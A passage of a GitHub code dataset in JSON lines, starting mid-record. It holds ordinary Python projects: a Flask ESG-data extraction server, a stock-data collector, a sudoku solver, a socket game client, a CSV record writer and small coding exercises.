{submission.title} \\n\"\n f\"Flair: {submission.link_flair_text} \\n\"\n f\"Timezone(s): {', '.join(post.timezone) if post.timezone else 'Unknown'} \\n\"\n f\"Day(s): {', '.join(sort_days(post.day)) if post.day else 'Unknown'} \\n\"\n f\"Time: {post.time if post.time else 'Unknown'} \\n\"\n f\"Notes: {', '.join(flags) if flags else 'None'} \\n\"\n f\"Link: https://www.reddit.com{post.permalink} \\n\"\n f\"{MessageText.SUBMISSION_NOTIFICATION_BODY}\"\n )\n notification.type = Notification.NotificationType.SUBMISSION\n\n for user in users:\n notification.username = user\n redis.append(notification)\n\n return \", \".join(users)\n","repo_name":"hunter-read/lfg-notify-bot","sub_path":"src/service/submission_queueing.py","file_name":"submission_queueing.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"4390960447","text":"import json\nimport argparse\nimport glob\nimport os\nimport time\nfrom datetime import timedelta\nfrom flask import Flask, Response, request\nimport shutil\nimport traceback\nfrom s3_communication import S3Communication\n\nfrom esg_data_pipeline.components import Extractor\nfrom esg_data_pipeline.config import config\nfrom esg_data_pipeline.components import Curator\n\napp = Flask(__name__)\n\n\ndef create_directory(directory_name):\n os.makedirs(directory_name, exist_ok=True)\n for filename in os.listdir(directory_name):\n file_path = os.path.join(directory_name, filename)\n try:\n os.unlink(file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n\n\n@app.route(\"/liveness\")\ndef liveness():\n return Response(response={}, status=200)\n\n\n@app.route('/extract/')\ndef run_extraction():\n args = json.loads(request.args['payload'])\n project_name = args[\"project_name\"]\n \n extraction_settings = args['extraction']\n \n BASE_DATA_PROJECT_FOLDER = config.DATA_FOLDER / project_name\n config.PDF_FOLDER = BASE_DATA_PROJECT_FOLDER / 'interim' / 'pdfs' \n BASE_INTERIM_FOLDER = BASE_DATA_PROJECT_FOLDER / 'interim' / 'ml'\n config.EXTRACTION_FOLDER = BASE_INTERIM_FOLDER / 'extraction'\n config.ANNOTATION_FOLDER = BASE_INTERIM_FOLDER / 'annotations'\n config.STAGE = 'extract'\n \n create_directory(config.EXTRACTION_FOLDER)\n create_directory(config.ANNOTATION_FOLDER)\n create_directory(config.PDF_FOLDER)\n \n s3_usage = args[\"s3_usage\"]\n if s3_usage:\n s3_settings = args[\"s3_settings\"]\n project_prefix = s3_settings['prefix'] + \"/\" + project_name + '/data'\n # init s3 connector\n s3c_main = S3Communication(\n s3_endpoint_url=os.getenv(s3_settings['main_bucket']['s3_endpoint']),\n aws_access_key_id=os.getenv(s3_settings['main_bucket']['s3_access_key']),\n aws_secret_access_key=os.getenv(s3_settings['main_bucket']['s3_secret_key']),\n s3_bucket=os.getenv(s3_settings['main_bucket']['s3_bucket_name']),\n )\n s3c_interim = S3Communication(\n s3_endpoint_url=os.getenv(s3_settings['interim_bucket']['s3_endpoint']),\n aws_access_key_id=os.getenv(s3_settings['interim_bucket']['s3_access_key']),\n aws_secret_access_key=os.getenv(s3_settings['interim_bucket']['s3_secret_key']),\n s3_bucket=os.getenv(s3_settings['interim_bucket']['s3_bucket_name']),\n )\n if extraction_settings['use_extractions']:\n s3c_main.download_files_in_prefix_to_dir(project_prefix + '/output/TEXT_EXTRACTION', \n config.EXTRACTION_FOLDER)\n s3c_interim.download_files_in_prefix_to_dir(project_prefix + '/interim/ml/annotations', \n config.ANNOTATION_FOLDER)\n if 
args['mode'] == 'train':\n s3c_main.download_files_in_prefix_to_dir(project_prefix + '/input/pdfs/training', \n config.PDF_FOLDER)\n else:\n s3c_main.download_files_in_prefix_to_dir(project_prefix + '/input/pdfs/inference', \n config.PDF_FOLDER)\n \n pdfs = glob.glob(os.path.join(config.PDF_FOLDER, \"*.pdf\"))\n if len(pdfs) == 0:\n msg = \"No pdf files found in the pdf directory ({})\".format(config.PDF_FOLDER)\n return Response(msg, status=500)\n \n annotation_files = glob.glob(os.path.join(config.ANNOTATION_FOLDER, \"*.csv\"))\n if len(annotation_files) == 0:\n msg = \"No annotations.csv file found on S3.\"\n return Response(msg, status=500)\n elif len(annotation_files) > 2:\n msg = \"Multiple annotations.csv files found on S3.\"\n return Response(msg, status=500)\n \n config.SEED = extraction_settings[\"seed\"]\n config.PDFTextExtractor_kwargs['min_paragraph_length'] = extraction_settings[\"min_paragraph_length\"]\n config.PDFTextExtractor_kwargs['annotation_folder'] = extraction_settings[\"annotation_folder\"]\n config.PDFTextExtractor_kwargs['skip_extracted_files'] = extraction_settings[\"skip_extracted_files\"]\n\n ext = Extractor(config.EXTRACTORS)\n\n try:\n t1 = time.time()\n ext.run_folder(config.PDF_FOLDER, config.EXTRACTION_FOLDER)\n t2 = time.time()\n except Exception as e:\n msg = \"Error during extraction\\nException:\" + str(e)\n return Response(msg, status=500)\n\n extracted_files = os.listdir(config.EXTRACTION_FOLDER)\n if len(extracted_files) == 0:\n msg = \"Extraction Failed. No file was found in the extraction directory ({})\"\\\n .format(config.EXTRACTION_FOLDER)\n return Response(msg, status=500)\n\n failed_to_extract = \"\"\n for pdf in pdfs:\n pdf = os.path.basename(pdf)\n pdf = pdf.split(\".pdf\")[0]\n if not any([pdf in e for e in extracted_files]):\n failed_to_extract += pdf + \"\\n\"\n\n msg = \"Extraction finished successfully.\"\n if len(failed_to_extract) > 0:\n msg += \"The following pdf files, however, did not get extracted:\\n\" + failed_to_extract\n \n if s3_usage:\n s3c_interim.upload_files_in_dir_to_prefix(config.EXTRACTION_FOLDER, \n project_prefix + '/interim/ml/extraction')\n # clear folder\n create_directory(config.EXTRACTION_FOLDER)\n create_directory(config.ANNOTATION_FOLDER)\n create_directory(config.PDF_FOLDER)\n time_elapsed = str(timedelta(seconds=t2 - t1))\n msg += \"\\nTime elapsed:{}\".format(time_elapsed)\n return Response(msg, status=200)\n\n\n@app.route('/curate/')\ndef run_curation():\n args = json.loads(request.args['payload'])\n project_name = args[\"project_name\"]\n curation_settings = args[\"curation\"]\n\n BASE_DATA_PROJECT_FOLDER = config.DATA_FOLDER / project_name\n BASE_INTERIM_FOLDER = BASE_DATA_PROJECT_FOLDER / 'interim' / 'ml'\n config.EXTRACTION_FOLDER = BASE_INTERIM_FOLDER / 'extraction'\n config.CURATION_FOLDER = BASE_INTERIM_FOLDER / 'curation'\n config.ANNOTATION_FOLDER = BASE_INTERIM_FOLDER / 'annotations'\n config.KPI_FOLDER = BASE_DATA_PROJECT_FOLDER / 'interim' / 'kpi_mapping'\n create_directory(config.EXTRACTION_FOLDER)\n create_directory(config.CURATION_FOLDER)\n create_directory(config.ANNOTATION_FOLDER)\n \n s3_usage = args[\"s3_usage\"]\n if s3_usage:\n s3_settings = args[\"s3_settings\"]\n project_prefix = s3_settings['prefix'] + \"/\" + project_name + '/data'\n # init s3 connector\n s3c_main = S3Communication(\n s3_endpoint_url=os.getenv(s3_settings['main_bucket']['s3_endpoint']),\n aws_access_key_id=os.getenv(s3_settings['main_bucket']['s3_access_key']),\n 
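# the settings hold env-var *names*; the secret values are resolved here via os.getenv\n            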
aws_secret_access_key=os.getenv(s3_settings['main_bucket']['s3_secret_key']),\n s3_bucket=os.getenv(s3_settings['main_bucket']['s3_bucket_name']),\n )\n s3c_interim = S3Communication(\n s3_endpoint_url=os.getenv(s3_settings['interim_bucket']['s3_endpoint']),\n aws_access_key_id=os.getenv(s3_settings['interim_bucket']['s3_access_key']),\n aws_secret_access_key=os.getenv(s3_settings['interim_bucket']['s3_secret_key']),\n s3_bucket=os.getenv(s3_settings['interim_bucket']['s3_bucket_name']),\n )\n s3c_main.download_files_in_prefix_to_dir(project_prefix + '/input/kpi_mapping', config.KPI_FOLDER)\n s3c_interim.download_files_in_prefix_to_dir(project_prefix + '/interim/ml/extraction', config.EXTRACTION_FOLDER)\n s3c_main.download_files_in_prefix_to_dir(project_prefix + '/input/annotations',\n config.ANNOTATION_FOLDER)\n\n shutil.copyfile(os.path.join(config.KPI_FOLDER, \"kpi_mapping.csv\"), \"/app/code/kpi_mapping.csv\")\n\n config.STAGE = 'curate'\n config.TextCurator_kwargs['retrieve_paragraph'] = curation_settings['retrieve_paragraph']\n config.TextCurator_kwargs['neg_pos_ratio'] = curation_settings['neg_pos_ratio']\n config.TextCurator_kwargs['columns_to_read'] = curation_settings['columns_to_read']\n config.TextCurator_kwargs['company_to_exclude'] = curation_settings['company_to_exclude']\n config.TextCurator_kwargs['min_length_neg_sample'] = curation_settings['min_length_neg_sample']\n config.SEED = curation_settings['seed']\n\n try:\n if len(config.CURATORS) != 0:\n cur = Curator(config.CURATORS)\n cur.run(config.EXTRACTION_FOLDER, config.ANNOTATION_FOLDER, config.CURATION_FOLDER)\n except Exception as e:\n msg = \"Error during curation\\nException:\" + str(repr(e)) + traceback.format_exc()\n return Response(msg, status=500)\n \n if s3_usage:\n s3c_interim.upload_files_in_dir_to_prefix(config.CURATION_FOLDER, \n project_prefix + '/interim/ml/curation')\n # clear folder\n create_directory(config.KPI_FOLDER)\n create_directory(config.EXTRACTION_FOLDER)\n create_directory(config.ANNOTATION_FOLDER)\n create_directory(config.CURATION_FOLDER)\n \n return Response(\"Curation OK\", status=200)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='inference server')\n # Add the arguments\n parser.add_argument('--port',\n type=int,\n default=4000,\n help='port to use for the extract server')\n args_server = parser.parse_args()\n port = args_server.port\n app.run(host=\"0.0.0.0\", port=port)\n","repo_name":"os-climate/corporate_data_extraction","sub_path":"data_extractor/code/esg_data_pipeline/esg_data_pipeline/extraction_server.py","file_name":"extraction_server.py","file_ext":"py","file_size_in_byte":9614,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"27870905371","text":"from name_yalsooni.crawler_py.ebest.xaquery.assistant.abstract import DBResponseAssistant, Assistant, ResponseAssistant\nfrom name_yalsooni.crawler_py.ebest.xaquery.command.abstract import CM\nfrom name_yalsooni.crawler_py.ebest.xaquery.command.t1717 import T1717Command\nfrom name_yalsooni.crawler_py.ebest.util import Log\n\n\nclass T1717Assistant(Assistant):\n\n def __init__(self):\n super(T1717Assistant, self).__init__(T1717Command.TR_NAME, 3)\n self._response_dict[CM.RES_TYPE_DB] = T1717DBInsert()\n self._response_dict[CM.RES_TYPE_SOCKET] = T1717Socket()\n\n def request_process(self, command):\n Log.write(command.get_tr_name() + \" - \" + command.get_hname() + \" Request\")\n self.tr.SetFieldData(\"t1717InBlock\", \"shcode\", 0, 
command.get_shcode())\n self.tr.SetFieldData(\"t1717InBlock\", \"gubun\", 0, \"0\")\n self.tr.SetFieldData(\"t1717InBlock\", \"fromdt\", 0, command.get_max_date())\n self.tr.SetFieldData(\"t1717InBlock\", \"todt\", 0, command.get_today())\n self.tr.Request(0)\n return True\n\n\nclass T1717DBInsert(DBResponseAssistant):\n\n T1717_INSERT = \"INSERT INTO COL_EB_T1717 ( REQDT, SHCODE, DATE, CLOSE, SIGN, CHANGE_, DIFF, VOLUME, TJJ0000_VOL, TJJ0001_VOL, TJJ0002_VOL, TJJ0003_VOL, TJJ0004_VOL, TJJ0005_VOL, TJJ0006_VOL, TJJ0007_VOL, TJJ0008_VOL, TJJ0009_VOL, TJJ0010_VOL, TJJ0011_VOL, TJJ0018_VOL, TJJ0016_VOL, TJJ0017_VOL, TJJ0000_DAN, TJJ0001_DAN, TJJ0002_DAN, TJJ0003_DAN, TJJ0004_DAN, TJJ0005_DAN, TJJ0006_DAN, TJJ0007_DAN, TJJ0008_DAN, TJJ0009_DAN, TJJ0010_DAN, TJJ0011_DAN, TJJ0018_DAN, TJJ0016_DAN, TJJ0017_DAN) VALUES ( %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s )\"\n\n def db_response_process(self, command, tr, request_date, curs):\n \n result_count = tr.GetBlockCount(\"t1717OutBlock\")\n for i in range(0, result_count):\n try:\n curs.execute(self.T1717_INSERT, (\n command.get_request_date(),\n command.get_shcode(),\n tr.GetFieldData(\"t1717OutBlock\", \"date\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"close\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"sign\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"change\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"diff\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"volume\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0000_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0001_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0002_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0003_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0004_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0005_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0006_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0007_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0008_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0009_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0010_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0011_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0018_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0016_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0017_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0000_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0001_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0002_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0003_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0004_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0005_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0006_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0007_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0008_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0009_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0010_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0011_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0018_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0016_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0017_dan\", i)\n )\n )\n except Exception as ex:\n Log.write(str(ex))\n continue\n\n\nclass T1717Socket(ResponseAssistant):\n\n def response_process(self, command, tr):\n 
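# no-op: socket-type responses are unused for t1717; persistence is handled by T1717DBInsert\n        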
pass\n","repo_name":"malchooni/EBestAPI_Python","sub_path":"name_yalsooni/crawler_py/ebest/xaquery/assistant/t1717.py","file_name":"t1717.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"35467511096","text":"from pathlib import Path\nimport pickle\nfrom PIL import Image\nimport numpy as np\n\ndef create_datafile():\n image_index = []\n labels = []\n pathlist = Path('./cell_images').glob('**/*.png')\n for path in pathlist:\n image_index.append(str(path))\n if 'Parasitized' in str(path):\n labels.append(1)\n else:\n labels.append(0)\n with open('data.pickle', 'wb') as datafile: \n pickle.dump(image_index, datafile)\n pickle.dump(labels, datafile)\n\nif __name__ == '__main__':\n create_datafile()\n","repo_name":"Beondel/Malaria-CNN","sub_path":"datawrangler.py","file_name":"datawrangler.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17503002294","text":"# My turn\ndef solution(s):\n answer = []\n\n if len(s) == 1: # 문자열 하나 입력되면 1 리턴\n return(1)\n \n s_list = list(s) # 리스트로 만들기\n \n # 1~문자열 길이만큼(절반 이상 나눠봤자 같은 쌍이 없음)\n for k in range(1,len(s)//2+1): \n cnt = 1 # 다음 문자와 같을 때 증가할 변수\n arr=[] # 2개 이상 문자열을 나눌때 그 쌍을 담을 배열\n string = '' # 최종 압축 문자열(누적해서 결과까지)\n\n if k == 1: # k==1 (문자열 하나씩만 비교)\n for i in range(len(s_list)-1): # 이전 원소까지\n if s_list[i] == s_list[i+1]: # 현재 문자가 다음 문자와 같으면\n cnt += 1 # cnt 증가\n else: # 현재 문자가 다음 문자와 다를때\n if cnt != 1: # cnt가 세어졌다면\n string += str(cnt) + s_list[i] # cnt와 현재 문자를 합친 문자열을 누적\n cnt = 1 # cnt 초기화\n else: # cnt가 안 세어졌다면\n string += s_list[i] # 현재 문자 그대로 문자열 누적\n\n if i == len(s_list)-2: # 마지막 이전 문자\n if cnt == 1: # cnt가 세어지지 않았다면\n string += s_list[i+1] # 맨 마지막 문자 누적\n else: # cnt가 세어져다면\n string += str(cnt) + s_list[i] # cnt와 마지막 이전 문자 출력\n answer.append(len(string)) # 해당 문자열의 길이를 정답 배열에 추가\n else: # k != 1\n for i in range(len(s_list)): # 마지막 원소까지\n if i == 0: # 첫번째 문자면\n string += s_list[i] # 문자 누적\n continue\n \n if i % k == 0: # 만약 현재 인덱스가 k로 나눠떨어지면\n arr.append(string) # 이전까지 누적되었던 문자를 arr 배열에 추가\n string = '' # 문자 초기화\n string += s_list[i] # 현재문자 다시 string에 기록\n else: # 그렇지 않으면(k로 안나눠지면)\n string += s_list[i] # 현재 문자 누적\n\n if i == len(s_list)-1 and len(s_list) % i != 0: # 맨 마지막 원소 그리고 나머지 문자가 있을때\n arr.append(string) # 누적된 문자를 arr 배열 추가\n\n \n test = '' # 최종 압축 문자열\n for i in range(len(arr)-1): # 마지막 이전까지\n if arr[i] == arr[i+1]:# 현재 문자가 다음 문자와 같으면\n cnt += 1 # cnt 증가\n else:# 현재 문자가 다음 문자와 다를때\n if cnt != 1:# cnt가 세어졌다면\n test += str(cnt) + arr[i]# cnt와 현재 문자를 합친 문자열을 누적\n cnt = 1# cnt 초기화\n else:# cnt가 안 세어졌다면\n test += arr[i] # 현재 문자 그대로 문자열 누적\n \n if i == len(arr)-2:# 마지막 이전 문자\n if cnt == 1:# cnt가 세어지지 않았다면\n test += arr[i+1]# 맨 마지막 문자 누적\n else: # cnt가 세어져다면\n test += str(cnt) + arr[i]# cnt와 마지막 이전 문자 출력\n answer.append(len(test))# 해당 문자열의 길이를 정답 배열에 추가\n\n return min(answer)\n\nprint(solution(\"acacacacacacbacacacacacac\"))\n\n# Good explanation\ndef compress(text, tok_len):\n # 토큰만큼 나눠 문자열 분리 저장\n words = [text[i:i+tok_len] for i in range(0, len(text), tok_len)]\n res = [] # 현재 단어와, cnt 저장할 배열\n cur_word = words[0] # 현제 딘어: 0번째 \n cur_cnt = 1 # 현재 cnt = 1\n for a, b in zip(words, words[1:] + ['']): # zip을 사용하여 현재원소와 다음원소 비교\n if a == b: # 같으면 \n cur_cnt += 1 # cnt 증가\n else: # 다르면\n res.append([cur_word, cur_cnt]) # 현재 저장된 단어와 현재 저장된 cnt 추가\n cur_word = b # 현재 단어를 갱신\n cur_cnt = 1 # cnt 1로 갱신\n # 갯수가 한개인건 그대로 계산 , 2이상 cnt가 있는 문자와 그 
카운트 숫자(1카운트)의 합\n return sum(len(word) + (len(str(cnt)) if cnt > 1 else 0) for word, cnt in res)\n\ndef solution(text): \n # 1~문자열 길이 절반만큼의 토큰을 부여하고 이들중 최소 문자열 길이 출력\n return min(compress(text, tok_len) for tok_len in list(range(1, int(len(text)/2) + 1)) + [len(text)])\n\na = [\n \"aabbaccc\",\n \"ababcdcdababcdcd\",\n \"abcabcdede\",\n \"abcabcabcabcdededededede\",\n \"xababcdcdababcdcd\",\n\n 'aaaaaa',\n]\n\nfor x in a:\n print(solution(x))","repo_name":"leesh125/Programmers_coding_test","sub_path":"lv2/Python3/ZipString.py","file_name":"ZipString.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7193160413","text":"import csv\nimport ntpath\n\n\nclass CsvRecordOfPopulation:\n\n def __init__(self, file_name):\n self._file_name = ntpath.basename(file_name)\n\n self._person_file = open(file_name + '_persons.csv', 'w', encoding='utf8')\n self._source_text_file = open(file_name + '_source_texts.csv', 'w', encoding='utf8')\n\n self._person_field_names = ['kairaId', 'firstNames', 'lastNames', 'formerSurname', 'sourceTextId']\n self._source_text_field_names = ['sourceTextId', 'sourceText']\n\n self._person_writer = csv.DictWriter(self._person_file, fieldnames=self._person_field_names)\n self._person_writer.writeheader()\n\n self._source_text_writer = csv.DictWriter(self._source_text_file, fieldnames=self._source_text_field_names)\n self._source_text_writer.writeheader()\n self._source_texts = {}\n\n self._source_text_id_counter = 0\n\n def _get_source_text_id(self):\n self._source_text_id_counter += 1\n return self._file_name + '_' + str(self._source_text_id_counter)\n\n def _add_source_text(self, text):\n if text in self._source_texts:\n return self._source_texts[text]\n else:\n text_id = self._get_source_text_id()\n self._source_texts[text] = text_id\n\n return text_id\n\n def add_primary_person(self, data_entry):\n source_text_id = self._add_source_text(data_entry['personMetadata']['sourceText'])\n\n self._person_writer.writerow({'kairaId': data_entry['primaryPerson']['kairaId'],\n 'firstNames': data_entry['primaryPerson']['name']['firstNames'],\n 'lastNames': data_entry['primaryPerson']['name']['surname'],\n 'formerSurname': data_entry['primaryPerson']['formerSurname'],\n 'sourceTextId': source_text_id})\n\n return source_text_id\n\n def add_child(self, data_entry, child):\n source_text_id = self._add_source_text(data_entry['personMetadata']['sourceText'])\n\n self._person_writer.writerow({'kairaId': child['kairaId'],\n 'firstNames': child['name'],\n 'lastNames': data_entry['primaryPerson']['name']['surname'],\n 'formerSurname': None,\n 'sourceTextId': source_text_id})\n\n return source_text_id\n\n def add_spouse(self, data_entry, spouse):\n source_text_id = self._add_source_text(data_entry['personMetadata']['sourceText'])\n\n self._person_writer.writerow({'kairaId': spouse['kairaId'],\n 'firstNames': spouse['firstNames'],\n 'lastNames': data_entry['primaryPerson']['name']['surname'],\n 'formerSurname': spouse['formerSurname'],\n 'sourceTextId': source_text_id})\n\n return source_text_id\n\n def save_to_file(self):\n self._source_texts = sorted([{'sourceTextId': text_id, 'sourceText': text} for text, text_id in self._source_texts.items()], key=lambda x: x['sourceTextId'])\n self._source_text_writer.writerows(self._source_texts)\n\n self._person_file.close()\n 
self._source_text_file.close()\n","repo_name":"Learning-from-our-past/karelian-db","sub_path":"db_management/csv_record.py","file_name":"csv_record.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35166214799","text":"data = []\nx = 0\nwhile True:\n user = input(\"Masukkan Angka : \")\n if user == 'n':\n break\n x += 1\n data.append(user)\n\nRatarata = 0\nfor nilai in data:\n Ratarata += int(nilai)\nRatarata /= x\nprint(Ratarata)\n","repo_name":"ShaneJohanes20/UAS-Pemrograman","sub_path":"UAS Pemrograman/soalNomor3.py","file_name":"soalNomor3.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2885464291","text":"#!/usr/bin/env python3\n\nimport socket, sys\nfrom constants import *\n\n# define host and port\nif len(sys.argv) != 3:\n print(\"Usage : python3 client.py \")\n exit()\nelse:\n host = sys.argv[1]\n port = int(sys.argv[2])\n\n# create socket\ntry:\n sc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sc.setsockopt(socket.SOL_SOCKET , socket.SO_REUSEADDR , 1)\nexcept socket.error as msg:\n print(\"Erreur de création de la socket : \" + str(msg))\n exit()\n# connect to server\ntry:\n sc.connect((host, port))\nexcept socket.error as msg:\n print(\"Erreur de connexion : \" + str(msg))\n exit()\n\nwhile True:\n \"\"\" Receive the message from the server \"\"\"\n # receive action from server\n action = sc.recv(1)\n # if action is empty, the server has closed the connection\n if action == b\"\":\n break\n # parse action to int and execute the corresponding action\n action = int(action.decode())\n\n if action == SHOW_GRID:\n grid = sc.recv(98).decode()\n print(grid)\n elif action == NEW_PLAYER:\n print(\"Nouveau joueur connecté\")\n elif action == GET_CLIENT_SHOT:\n sc.send(input(\"Quelle case voulez-vous jouer ?\").encode(\"utf-8\"))\n elif action == WINNER:\n print(\"Vous avez gagné !\")\n elif action == LOOSER:\n print(\"Vous avez perdu !\")\n elif action == SCORE:\n score = sc.recv(22).decode()\n print(score)\n elif action == REPLAY:\n sc.send(input(\"Voulez-vous rejouer ? 
(Y / N)\\n\").encode(\"utf-8\"))\n\n# close socket\nprint(\"Close\")\nsc.close()\n","repo_name":"NCombarieu/Morpion","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1315381297","text":"from file_manager import * # idea: usare griglia delle entropie?\r\n\r\nSIZE = 9 # solo 9x9\r\n\r\n\r\ndef initialize_grid():\r\n grid = [[None for _ in range(SIZE)] for _ in range(SIZE)]\r\n for i in range(SIZE):\r\n for j in range(SIZE):\r\n grid[i][j] = [1 if i != SIZE else -1 for i in range(SIZE + 1)]\r\n return grid\r\n\r\n\r\ndef compile_grid(grid, data):\r\n for index, number in enumerate(data):\r\n if number != 0:\r\n for i in range(SIZE):\r\n grid[index // SIZE][index % SIZE][i] = int(i == number - 1)\r\n grid[index // SIZE][index % SIZE][-1] = number - 1\r\n decrease_entropy(grid, index % SIZE, index // SIZE)\r\n\r\n\r\ndef available(x, y):\r\n return 0 <= x < SIZE and 0 <= y < SIZE\r\n\r\n\r\ndef decrease_entropy(grid, x, y): # chiamata quando viene compiuta una mossa\r\n v = grid[y][x][-1]\r\n\r\n for i in range(SIZE):\r\n if available(x, i) and grid[i][x][-1] == -1: # colonna\r\n grid[i][x][v] = 0\r\n if available(i, y) and grid[y][i][-1] == -1: # riga\r\n grid[y][i][v] = 0\r\n if grid[(y // 3) * 3 + i // 3][(x // 3) * 3 + i % 3][-1] == -1: # quadrato\r\n grid[(y // 3) * 3 + i // 3][(x // 3) * 3 + i % 3][v] = 0\r\n\r\n\r\ndef collapse(grid, x, y, v):\r\n grid[y][x][-1] = v\r\n grid[y][x][v] = 0\r\n\r\n\r\ndef stack_add(stack, grid, x, y): # dovrebbe funzionare...\r\n copy = [[None for _ in range(SIZE)] for _ in range(SIZE)]\r\n \r\n for i in range(SIZE):\r\n for j in range(SIZE):\r\n copy[i][j] = [k for k in grid[i][j]]\r\n copy[y][x][-1] = -1\r\n stack.append(copy)\r\n\r\n\r\ndef find_collapse(grid, stack):\r\n x, y, v, e = None, None, None, SIZE + 1\r\n flag = False\r\n status = None # 0 avanti, 1 completo, 2 contraddizione\r\n\r\n for i in range(SIZE):\r\n for j in range(SIZE):\r\n if grid[i][j][-1] == -1:\r\n current = sum(grid[i][j][:-1])\r\n\r\n if current < e and current != 0: # randomizzare?\r\n e = current\r\n y, x = i, j\r\n candidates = [n for n, k in enumerate(grid[i][j][:-1]) if k]\r\n v = candidates[0]\r\n\r\n if current == 1:\r\n flag = True\r\n break\r\n\r\n elif current == 0:\r\n return i, j, 2\r\n\r\n if flag:\r\n break\r\n\r\n if x is None or y is None or v is None: # tutte condizioni equivalenti...\r\n return x, y, 1\r\n\r\n collapse(grid, x, y, v) # compi la scelta\r\n\r\n if not flag: # scelta arbitraria\r\n status = 0\r\n stack_add(stack, grid, x, y)\r\n\r\n return x, y, status\r\n\r\n\r\n\r\ndef solve(input_file):\r\n data = obtain_grid(input_file)\r\n grid = initialize_grid()\r\n compile_grid(grid, data)\r\n\r\n stack = []\r\n\r\n while True:\r\n\r\n x, y, s = find_collapse(grid, stack)\r\n\r\n if s == 2:\r\n grid = stack.pop(-1)\r\n elif s != 1:\r\n decrease_entropy(grid, x, y)\r\n else:\r\n break\r\n\r\n\r\n print(\"done\")\r\n write_output(\"output.txt\", grid)\r\n\r\n\r\nsolve(\"input.txt\")\r\n","repo_name":"Sierpinski22/Python-Projects","sub_path":"sudoku solver/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20131406679","text":"import unittest\n\nimport zope.interface.verify\n\nfrom mk import interfaces\nfrom mk import resources\n\n\nclass 
RootResourceTestCase(unittest.TestCase):\n def test_base_resource_sets_request_on_self(self):\n request = {}\n resource = resources.BaseResource(request)\n self.assertIs(resource.request, request)\n\n def test_root_resource_implements_root_endpoint(self):\n zope.interface.verify.verifyClass(\n interfaces.IRootEndpoint,\n resources.RootResource,\n )\n","repo_name":"monokrome/monokro.me","sub_path":"mk/resources_spec.py","file_name":"resources_spec.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70635293548","text":"n1 = int(input(\"Qual o primeiro número? \"))\nn2 = int(input(\"Qual o segundo número? \"))\ns = n1 + n2\nm = n1 * n2\nd = n1 / n2\ndi = n1 // n2\ne = n1 ** n2\nr = n1 % n2\n# para formatar 3 números após a vírgula (:.3f)\n# Para não pular a linha e/ou adicional algo no final (end = ' ') e para adicionar outra linha (\\n)\nprint(\"A soma é {},\\nO produto é: {} e a divisão é: {:.3f}\".format(s, m, d), end=\" \")\nprint(\"A divisão inteira é: {}, a potência é: {} e 